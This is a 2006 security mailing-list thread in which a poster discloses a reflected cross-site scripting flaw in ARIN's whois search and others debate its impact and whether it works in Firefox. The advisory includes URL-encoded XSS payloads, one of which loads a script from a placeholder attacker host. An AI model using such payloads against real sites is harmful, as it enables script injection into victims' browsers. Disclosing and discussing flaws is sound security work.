It works in IE just fine and probably some other browsers.
Firefox does a few things:
1) It takes the liberty of converting "<" to %3C
2) Leaves %3C as %3C and does not convert into "<"
This prevents the script from being interpreted (in)properly via the Address
bar.
Steven
----- Original Message -----
From: "Simon Smith" <[EMAIL PROTECTED]>
To: "Steven" <[EMAIL PROTECTED]>
Cc: "Terminal Entry" <[EMAIL PROTECTED]>; "Full Disclosure"
<[email protected]>; "Bug Traq" <[email protected]>
Sent: Friday, March 03, 2006 4:09 PM
Subject: Re: [Full-disclosure] Arin.net XSS
Right,
Did this ever work? This fails for me man. How did you verify it?
Steven wrote:
ok?
So what exactly are you going to exploit here? This site doesn't have
any logins or even use cookies. Are you going to trick a user into
entering in a credit card number before they can search the whois
database?
I think that XSS in many instances is a serious issues. Many of the XSS
issues reported on FD are rarely of much consequence but could
theoretically lead to a sessions hijack or tricking the user into a fake
login screen. However, in this instance I fail to see what the point
could possible be? If it is that you can simply run javascript then so
what? Close to 100% of any webhosting provider on the internet will let
you upload your own javascript. Might as well report that geocities.com
is vulnerable to XSS because you could upload an html file with
javascript on it.
Anyway.. that's my take on this. Feel free to correct me.. I don't mind.
Steven
----- Original Message -----
From: Terminal Entry
To: Full Disclosure ; Bug Traq
Sent: Thursday, March 02, 2006 11:17 PM
Subject: [Full-disclosure] Arin.net XSS
Title
ARIN.NET input validation holes in "?queryinput=" allows remote users
conduct cross-site scripting attacks
Notification
Multiple attempts to contact Arin site administrators went unanswered
Exploit Included: Yes
Description
The "?queryinput=" script does not properly validate user-supplied
input in several parameters to filter HTML code. A remote user can create
a specially crafted URL that, when loaded by a target user, will cause
arbitrary scripting code to be executed by the target user's browser.
Some demonstration exploit URLs are provided:
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
Discovered by Terminal Entry security [.at.] peadro (.)net
------------------------------------------------------------------------------
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they are
addressed. If you have received this email in error please notify the
system manager. This message contains confidential information and is
intended only for the individual named. If you are not the named
addressee you should not disseminate, distribute or copy this e-mail.
Please notify the sender immediately by e-mail if you have received this
e-mail by mistake and delete this e-mail from your system. If you are not
the intended recipient you are notified that disclosing, copying,
distributing or taking any action in reliance on the contents of this
information is strictly prohibited.
------------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
Regards,
Adriel T. Desautels
Harvard Security Group
http://www.harvardsecuritygroup.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
